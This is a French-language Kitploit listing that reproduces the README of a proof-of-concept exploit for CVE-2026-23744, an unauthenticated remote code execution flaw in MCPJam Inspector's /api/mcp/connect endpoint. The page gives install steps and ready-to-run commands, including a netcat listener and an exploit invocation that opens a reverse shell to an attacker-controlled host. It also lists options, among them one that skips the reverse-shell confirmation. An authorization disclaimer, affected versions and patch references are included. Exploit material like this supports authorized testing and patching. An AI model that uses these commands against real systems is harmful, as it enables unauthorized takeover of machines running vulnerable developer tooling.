Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23744 — Preuve de concept d'exécution de code à distance sans authentification pour CVE-2026-23744 ciblant MCPJam Inspector. Génère des charges utiles MCP serverConfig conçues pour exploiter le endpoint /api/mcp/connect avec prise en charge du shell inversé et du débogage en dry-run. | Kitploit
Outils/GitHubGitHub/ozcanpng/cve-2026-23744
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à Distance
GitHubozcanpng/cve-2026-23744

CVE-2026-23744

Preuve de concept d'exécution de code à distance sans authentification pour CVE-2026-23744 ciblant MCPJam Inspector. Génère des charges utiles MCP serverConfig conçues pour exploiter le endpoint /api/mcp/connect avec prise en charge du shell inversé et du débogage en dry-run.

11il y a 2 moisPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23744 — MCPJam Inspector RCE non authentifié

PoC d'exécution de code à distance non authentifié pour CVE-2026-23744. MCPJam Inspector 1.4.2 et versions antérieures exposent une fonctionnalité via /api/mcp/connect qui peut lancer une commande de serveur MCP contrôlée par un attaquant sans authentification.

Uniquement pour les tests et la recherche autorisés. Ne pas utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.


Ce qu'il fait

root@kitploit:~
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
  1. Construit une charge utile MCP serverConfig conçue.
  2. Cible le point de terminaison /api/mcp/connect non authentifié.
  3. Lance une commande configurée via bash -c.
  • Prend en charge la validation sécurisée des commandes et les charges utiles de reverse shell.
  • Fournit des modes dry-run/débogage pour inspecter la charge utile avant d'envoyer le trafic.

  • Captures d'écran

    Configuration du reverse shell

    Configuration du reverse shell

    Charge utile de connexion MCPJam

    Charge utile de connexion MCPJam

    Shell reçu

    Shell reçu


    Installation

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2026-23744.git
    cd CVE-2026-23744
    pip install -r requirements.txt
    

    Utilisation

    Preuve de commande sécurisée

    root@kitploit:~
    python3 CVE-2026-23744.py \
      --url http://127.0.0.1:3000 \
      --cmd 'id'
    

    Reverse shell

    Démarrez d'abord un écouteur :

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Exécutez ensuite :

    root@kitploit:~
    python3 CVE-2026-23744.py \
      --url http://127.0.0.1:3000 \
      --reverse-shell \
      --lhost 10.10.16.53 \
      --lport 4444
    

    Options utiles :

    root@kitploit:~
    --cmd COMMAND       Command to execute (default: id)
    --server-id VALUE   serverId value in the crafted MCP config (default: pwn)
    --dry-run           Build payload flow without sending the HTTP request
    --debug             Print endpoint and JSON payload
    --verify-tls        Verify HTTPS certificates
    --timeout SECONDS   HTTP timeout in seconds (default: 8)
    --yes               Skip reverse-shell confirmation prompt
    

    Affecté

    ProduitVersion affectéeAccès requisImpact
    MCPJam Inspector<= 1.4.2AucunExécution de commande à distance en tant qu'utilisateur du processus MCPJam Inspector

    Le problème est particulièrement exposé lorsque MCPJam Inspector écoute sur 0.0.0.0, permettant aux hôtes distants d'atteindre le service de développement.


    Remarques

    • Le PoC envoie une charge utile JSON à /api/mcp/connect.
    • La commande est transmise via serverConfig.command et serverConfig.args.
    • Préférez --cmd pour une validation sécurisée avant de tenter un reverse shell.
    • Utilisez --dry-run --debug pour inspecter la requête générée sans toucher à une cible.
    • La version 1.4.3 contient le correctif amont selon le NVD.

    Références

    • NVD — CVE-2026-23744
    • GitHub Security Advisory — GHSA-232v-j27c-5pp6
    • Patch commit
    • MCPJam Inspector

    Auteur du PoC

    ozcanpng — github.com/ozcanpng — ozcanpng.dev

    Télécharger l’outil